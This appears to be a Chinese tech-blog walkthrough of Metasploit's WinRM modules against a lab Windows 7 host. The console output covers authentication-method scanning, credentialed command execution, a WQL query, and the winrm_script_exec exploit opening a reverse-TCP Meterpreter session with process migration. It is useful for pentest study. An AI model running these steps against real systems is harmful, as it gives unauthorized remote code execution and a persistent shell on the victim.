metasploit - winrm

最新推荐文章于 2023-07-11 13:51:47 发布
最新推荐文章于 2023-07-11 13:51:47 发布
阅读量1.4k 收藏
点赞数
分类专栏: Pentesting Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/50408814
版权

WinRM

msf auxiliary(winrm_auth_methods) > show options

Module options (auxiliary/scanner/winrm/winrm_auth_methods):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DOMAIN   WORKSTATION      yes       The domain to use for Windows authentification
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.103    yes       The target address range or CIDR identifier
   RPORT    5985             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   URI      /wsman           yes       The URI of the WinRM service
   VHOST                     no        HTTP server virtual host

msf auxiliary(winrm_auth_methods) > run

[+] 192.168.1.103:5985: Negotiate protocol supported
[+] 192.168.1.103:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(winrm_cmd) > show options

Module options (auxiliary/scanner/winrm/winrm_cmd):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CMD          whoami           yes       The windows command to run
   DOMAIN       WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD     password         yes       The password to authenticate with
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.103    yes       The target address range or CIDR identifier
   RPORT        5985             yes       The target port
   SAVE_OUTPUT  false            yes       Store output as loot
   THREADS      1                yes       The number of concurrent threads
   URI          /wsman           yes       The URI of the WinRM service
   USERNAME     lab              yes       The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf auxiliary(winrm_cmd) > run

[+] sec\lab

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(winrm_wql) > show options

Module options (auxiliary/scanner/winrm/winrm_wql):

   Name       Current Setting                        Required  Description
   ----       ---------------                        --------  -----------
   DOMAIN     WORKSTATION                            yes       The domain to use for Windows authentification
   NAMESPACE  /root/cimv2/                           yes       The WMI namespace to use for queries
   PASSWORD   password                               yes       The password to authenticate with
   Proxies                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.103                          yes       The target address range or CIDR identifier
   RPORT      5985                                   yes       The target port
   THREADS    1                                      yes       The number of concurrent threads
   URI        /wsman                                 yes       The URI of the WinRM service
   USERNAME   lab                                    yes       The username to authenticate as
   VHOST                                             no        HTTP server virtual host
   WQL        Select Name,Status from Win32_Service  yes       The WQL query to run

msf auxiliary(winrm_wql) > run

[+] Select Name,Status from Win32_Service (192.168.1.103)
=====================================================

 Name                            Status
 ----                            ------
 ALG                             OK
 AeLookupSvc                     OK
 AppIDSvc                        OK
 AppMgmt                         OK
 ......
 ......
msf exploit(winrm_script_exec) > show options

Module options (exploit/windows/winrm/winrm_script_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKSTATION      yes       The domain to use for Windows authentification
   FORCE_VBS  false            yes       Force the module to use the VBS CmdStager
   PASSWORD   password         yes       A specific password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.103    yes       The target address
   RPORT      5985             yes       The target port
   URI        /wsman           yes       The URI of the WinRM service
   USERNAME   lab              yes       A specific username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(winrm_script_exec) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] checking for Powershell 2.0
[-] You selected an x86 payload for an x64 target...trying to run in compat mode
[*] Attempting to set Execution Policy
[+] Set Execution Policy Successfully
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\lab\AppData\Local\Temp\XcemuUGC.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (957487 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:49514) at 2015-12-26 15:37:13 +0800

meterpreter > 
[*] Session ID 1 (192.168.1.102:4444 -> 192.168.1.103:49514) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (1836)
[*] Attempting to move into explorer.exe for current user...
[+] Migrating to 2844
[+] Successfully migrated to process 2844

meterpreter > sysinfo
Computer        : SEC
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/win64

References

  1. https://social.technet.microsoft.com/Forums/windowsserver/en-US/e5f8cfee-d4a6-4e5c-9baf-e8a8a67d9316/winrm-access-denied
  2. https://community.rapid7.com/community/metasploit/blog/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit
  3. http://blogs.technet.com/b/jonjor/archive/2009/01/09/winrm-windows-remote-management-troubleshooting.aspx
  4. http://pubs.vmware.com/orchestrator-plugins/index.jsp?topic=%2Fcom.vmware.using.powershell.plugin.doc_10%2FGUID-D4ACA4EF-D018-448A-866A-DECDDA5CC3C1.html
Nixawk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wmi4j 远程执行cmd命令获取命令执行的结果
06-04
该代码实现了在远程windows主机上 获取进程列表 及进程对应的端口;使用wmi4j 连接远程主机获取进程列表,创建文件夹、共享文件夹、执行netstat -ano输出到aa.txt文件,读取文件、撤销文件夹共享、删除文件夹及aa.txt文件;即实现远程执行cmd命令获取命令执行的结果的效果。
开启和关闭Windows远程管理(WinRM
慢谈人生
12-01 2万+
Windows远程管理(WinRM)是Windows Server 2003 R2以上版本中一种新式的方便远程管理的服务。WinRM是远程管理应用的“服务器”组成部分,并且WinRS(Windows远程Shell)是WinRM的“客户端”,它在远程管理WinRM服务器的计算机上运行。 然而,我们应该注意到两个计算机必须手动安装WinRS,还要使WinRM能够启动并从远程系统传回信息。 WinRM基于Web服务管理(WS-Management)标准。 这么说的意思是:WinRM使用HTTP协议(80/5
windows server winrm介绍
c1052981766的专栏
04-11 4529
Windows远程管理(WinRM)Server2008R2中默认开启该服务,从Server2012开始,该服务便集成在系统中默认开启,Win7默认安装此服务,但是默认为禁用状态,Win8,Win10默认开启。这种远程连接不会被客户端察觉到,也不会占用远程连接数!使用端口:http 5985 https 5986//快速在服务端运行winrm c:\> winrm quickconfig...
横向远程命令执行——WINRM
YUKIDDDD的博客
08-01 1292
横向远程命令执行——WINRM1.cmd操作2.powershell操作 WinRMWindows远程管理)是Microsoft 在Windows中对WS-Management的实现,它使系统可以跨通用网络访问或交换管理信息。利用脚本对象或内置的命令行工具,WinRM可以与可能具有基板管理控制器(BMC)的任何远程计算机一起使用,以获取数据。也可以获取基于Windows的计算机(包括WinRM)。 WinRM默认端口5985(HTTP端口)或5986(HTTPS端口),若配置了WINRM远程服务,当我们
学习笔记-WinRM
人饭子的博客
11-05 1029
WinRM 什么是 WinRM Windows 远程管理(WinRM)是 WS-Management Protocol 的 Microsoft 实现。 WS-Management 协议是一种基于 SOAP 的防火墙友好协议,旨在用于系统查找和交换管理信息。WS-Management 协议规范的目的是为企业系统提供互操作性和一致性,其对防火墙友好的协议,允许来自不同供应商的硬件和操作系统进行互操...
metasploit-omnibus
03-31
metasploit-framework Omnibus项目 该项目为metasploit-framework创建了特定于平台的全栈软件包。 这与Metasploit社区版不同。 它仅包含框架命令行界面以及相关的工具和模块。 安装包装 如果您只想安装此软件包,...
metasploit-framework-master.zip
09-08
metasploit-framework-master
metasploit-4.17.1-2020080301-windows-x64-installer.exe
01-10
metasploit
Eternalblue-Doublepulsar-Metasploit-master
05-11
Eternalblue-Doublepulsar-Metasploit-master
Mastering-Metasploit-Third-Edition:精通Metasploit-第三版,由Packt发行
05-28
掌握Metasploit-第三版这是发行的的代码存储库。 它包含从头到尾完成本书所必需的所有支持项目文件。关于这本书我们首先提醒您有关Metasploit的基本功能及其以最传统的方式使用的信息。 您将了解将Metasploit模块...
Go-winrm-cli-一个命令行工具通过WinRMWindows机器上远程执行命令
08-13
winrm-cli - 一个命令行工具通过WinRMWindows机器上远程执行命令
安装.net framework3.5 无法打开运行空间池,服务器管理器winRM插件可能已经损坏
weixin_45467975的博客
07-11 536
安装.net framework3.5 无法打开运行空间池,服务器管理器winRM插件可能已经损坏
Windows开启winrm
zlb020的专栏
05-17 3748
非administrator用户需要执行以下步骤: 用户加到administrators组: 禁用UAC(改注册表) 为什么winrm要禁用uac,在这篇文章里可以找到: Disable User Account Control (UAC) - Windows Server | Microsoft Docs reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalA..
java项目使用winrm4j 命令中含有特殊字符和读取文件内容乱码问题。使用版本是0.12.3
wlj_wangjun的博客
06-02 214
使用winrm4j 执行命令中含有特殊字符和读取文件内容乱码问题
java通过winrm4j远程连接win执行命令
c1052981766的专栏
04-11 9177
说明:为什么使用winrm?    在Linux /UNIX/WINDOWS系统中,一般通过远程连接的方式在远端执行脚本命令或者其他,是通过SSH或者Telnet。笔者之前写过几遍运用JAVA使用SSH或者TELNET连接操作系统执行命令的博客。但这些协议之间存在的差别的。在LINUX、UNIX系统中一般通过SSH协议来登录、执行命令;而在Windows操作系统中,由于没有自带SSH协议,一般通过...
Metasploit - auxiliary/gather/zoomeye_search
热门推荐
Nixawk
10-19 43万+
How to use ZoomEye API ?If you are a python developer, please view ZoomEye-SDK. If not, ZoomEye API Documentation is good for you.$ sudo easy_install zoomeye-SDKor$ sudo pip install git+https://github.
metasploit - exploits
Nixawk
04-20 4万+
msf >use exploits/ use exploit/aix/rpc_cmsd_opcode21 use exploit/aix/rpc_ttdbserverd_realpath use exploit/android/browser/samsung_knox_smdm_url use exploit/android/browser/webview_addjavascriptinterfac
Metasploit2: tcp port 111 – rpcbind
Nixawk
07-29 8316
Metasploit2: tcpport 111 – rpcbind RPC& portmapper (111 TCP + other UDP) portmapper服务是这样工作的:当我连接portmapper端口时,表明我想使用一个指定的RPC服务。portmapper会告诉我该使用哪个端口.(RPC是RemoteProcedure Call的简称,类似与执行远程主机上
metasploitframework-latest
最新发布
07-13
4. 切换到克隆下来的 metasploit-framework 目录: ``` cd metasploit-framework ``` 5. 安装依赖项。在终端中运行以下命令: ``` bundle install ``` 6. 安装完成后,你可以通过以下命令启动 Metasploit ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值